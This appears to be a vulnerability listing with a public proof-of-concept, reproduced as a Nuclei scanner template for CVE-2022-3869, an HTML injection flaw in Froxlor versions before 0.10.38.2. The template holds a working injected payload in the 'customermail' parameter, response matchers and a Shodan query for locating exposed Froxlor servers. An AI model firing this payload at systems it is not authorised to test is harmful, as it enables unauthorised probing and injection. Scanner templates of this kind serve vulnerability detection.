漏洞描述
HTML Injection in GitHub repository froxlor/froxlor prior to 0.10.38.2.
CVE-2022-3869: Froxlor < 0.10.38.2. - HTML Injection
PoC代码[已公开]
id: CVE-2022-3869
info:
name: Froxlor < 0.10.38.2. - HTML Injection
author: ctflearner
severity: medium
description: |
HTML Injection in GitHub repository froxlor/froxlor prior to 0.10.38.2.
reference:
- https://huntr.com/bounties/7de20f21-4a9b-445d-ae2b-15ade648900b
- https://nvd.nist.gov/vuln/detail/CVE-2022-3869
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-3869
cwe-id: CWE-79
epss-score: 0.13165
epss-percentile: 0.93869
metadata:
verified: true
max-request: 1
shodan-query: title:"Froxlor"
product: froxlor
tags: cve2023,cve,froxlor,html,vuln
http:
- method: GET
path:
- "{{BaseURL}}/index.php?showmessage=4&customermail=\"><h2>TEST</h2>"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'The message to ""><h2>TEST</h2>" failed'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a00473045022071bc28cd622cb9d2133b899d675d2d7e08dba86d8edfc70ad0a639a3260df406022100d5e75262ac691defbbad1645a855fc32e7b56f045318f71173a3a6dc406619f3:922c64590222798bb761d5b6d8e72950